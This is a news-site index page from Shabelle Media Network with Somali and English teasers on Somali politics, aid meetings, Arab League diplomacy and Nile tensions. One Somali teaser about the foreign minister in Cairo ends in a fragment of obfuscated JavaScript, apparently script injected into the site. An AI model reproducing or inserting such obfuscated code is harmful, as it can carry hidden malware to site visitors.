Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Puntland Slams Unlawful Somali Media Council Formation

MOGADISHU, Somalia --- Puntland State Minister of Information, Mohamud Aydid Dirir, has strongly criticized the recent establishment of the Somali Media Council by Somalia's Ministry of Information. Speaking to journalists in Garowe, Dirir claimed the council was appointed without proper consultation with media organizations and civil society groups.   Dirir argues that the council’s formation breaches the 2020 amended media law,...

Guddoomiyaha SoDMA oo la kulmay wafdi ka socday Hay’adda WFP + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Md. Maxamuud Macallin Cabdulle oo uu wehliyo Guddoomiye ku xigeenkiisa Dr. Axmed Cabdi Aadan ayaa maanta xarunta dhexe ee Hay’adda kulan kula qaatay madaxa Hay’adda Cuntada Adduunka ee Soomaaliya (WFP) Mr Elkhadir Daloum.   Kulanka ayaa looga hadlay sii adkeynta xiriirka istiraatiijiga ah ee ka dhaxeeya labada hay’adood, hormarinta nidaamyada, u diyaar garoowga iyo...

Madaale oo furay Madasha La-tashiga bulsho ee Maqaamka Caasimadda

MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa daah-furay Madasha La-tashiga Bulsho ee Maqaamka Muqdisho iyo Xuquuqda Gobolka Banaadir, kaasi oo ay ka qeyb galayaan Odayaasha dhaqanka, Culumada, Dhalinyarada, Haweenka iyo Hormuudka Ururada Bulshada Soomaaliyeed.   Guddoomiye Kuxigeenka Amniga iyo Siyaasadda Gobolka Banaadir Mudane Maxamed Axmed Diiriye (Yabooh) oo furitaanka Madasha ka hadlay...

Guddoomiyaha Aqalka Sare oo la kulmay Danjiraha Midowga Yurub ee Soomaaliya

MUQDISHO (SMN) - Guddoomiyaha Aqalka Sare ee Baarlamaanka JFS Mudane Senator Abdi Hashi Abdullahi ayaa xafiiskiisa ku qaabilay Danjiraha Midowga Yurub u fadhiya Soomaaliya Marwo Karin Johansson oo wehliyo ku xigeenka Danjiraha Midowga Yurub Mudane Thomas Kieller.   Guddoomiyaha iyo Danjiraha waxay ka wada hadlay taageerada dhinacayada horumarinta ee Midowga Yurub uu siiyo Dowladda Soomaaliya, gaar ahaan taageerada Baarlamaanka Jamhuuriyadda Federaalka...

Ra’iisul Wasaare Xamsa oo Dhagax Dhigay Xarunta Wasaaradda Arrimaha Gudaha

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa dhagax dhigay xarunta Wasaaradda Arrimaha Gudaha iyo Federaalka Soomaaliya, taas oo qeyb ka ah dadaallada Xukuumadda ee lagu soo celinayo adeegyada muhiimka ah iyo tayeynta kaabayaasha dowladnimada.   Ra’iisul Wasaaraha ayaa hoosta ka xarriiqay muhiimadda ay leedahay in xarumaha dowladdu ay noqdaan kuwo u qalma shaqada iyo...

Maxkamadda Ciidamada Qalabka Sida oo xukun ku ridday todobo askari

MUQDISHO (SMN) - Maxkamadda sare ee Ciidamada Qalabka sida ayaa xukunno kala duwan kasoo saartay kiiska Eedeysanaal gaaraya Todobo, kuwaasi oo loo heysto dil, qal-qal gelin amin iyo ku takrifal dhul dowladeed.   Eedeysaneyaasha oo kala ah Dable Xoogga Mahdi Colaad Xiireey, Dable Xoogga Nuur Daahir Xersi, Dable xoogga Xasan Cabdulle Samatar Dable Xoogga Maxamed Khaliif Xuseen, Dable xoogga C/qani Cali...

Wasiirka Arrimaha Dibadda Soomaaliya oo gaaray magaalada Qaahira + Sawirro

QAAHIRA (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga, Mudane Danjire Axmed Macalin Fiqi, ayaa maanta oo Talaado ah gaaray Caasimadda Dalka Masar si uu uga qaybgalo Shirka 162aad ee Golaha Jaamacadda Carabta Heerkiisa Wasiirada.   shirka ayaa waxaa intiisa badan diiradda Lagu saari doonaa Arrimaha Amniga, Xasiloonida iyo Horumarka Dhaqaalaha Dalalka Carabta. Halkan hoose ka daawo Sawirrada:- function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let...

Somalia’s FM Fiqi Joins Arab League Council to Tackle Region’s Top Issues

CAIRO, Egypt — Foreign Minister Ahmed Moallim Fiqi touched down in Cairo today to engage in the 162nd session of the Arab League Council, convened at the ministerial level.   The high-profile meeting, set against the backdrop of the historic Arab League Headquarters, is poised to delve into an array of pressing issues pivotal to the Arab region. The agenda for this...

Somalia’s President Congratulates Algeria’s Tabboun on Re-election

MOGADISHU, Somalia — In a move signaling warmer diplomatic ties, Somalia's President Hassan Sheikh Mohamud congratulated his Algerian counterpart, President Abdulmajid Tabboun, on his re-election victory.   The congratulatory message was conveyed during a telephone conversation where both leaders expressed their intent to fortify the bilateral relationship between their countries. President Mohamud, in his remarks, highlighted President Tabboun's leadership qualities, voicing optimism...

Xiisadda u dhexeysa dalalka Itoobiya iyo Masar oo cirka isku-shareertay

MUQDISHO, Soomaaliya - Waxaa sii xoogeysanaya xiisadda u dhaxaysa Masar iyo Itoobiya ee salka ku haysa biyo-xireenka webiga Niil, iyadoo labada dowladooda ay warqado iska soo horjeeda u diray Gollaha Amaanka ee Qaramada Midoobay.   Masar ayaa u sheegtay Golaha Ammaanka ee Qaramada Midoobay, in Itoobiya iyadaa aan kala tashan Xukuumadda Qaahira ay dhameystirtay mashruuca biyo-xireenka webiga Niil, taasoo keentay inuu yaraado qulqulka biyihii...

WARAR KALE

Ra’iisul Wasaare Ku-xigeenka Soomaaliya oo beeniyay wararka sheegaya in Kenya ay masaafurisay

MUQDISHO – Ra'iisul Wasaare Ku-xigeenka 2-aad ee Dowladda Federaalka Soomaaliya, Jibriil Cabdirashiid Xaaji, ayaa beeniyay wararka sheegaya in 25-kii bishan laga soo celiyay dalka...

Somalia’s deputy prime minister denies reports of deportation from Kenya

MOGADISHU — Somalia's Second Deputy Prime Minister Jibril Abdirashid Haji has denied reports that he was denied entry and deported from Kenya on June 24,...

Ra’iisul Wasaare Xamsa oo xarigga ka jaray mashaariic horumarineed, kana dhagax-dhigay kuwo cusub

MUQDISHO -Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa magaalada Muqdisho ka daah-furay mashaariic horumarineed oo isugu jira waddooyin iyo xarumo...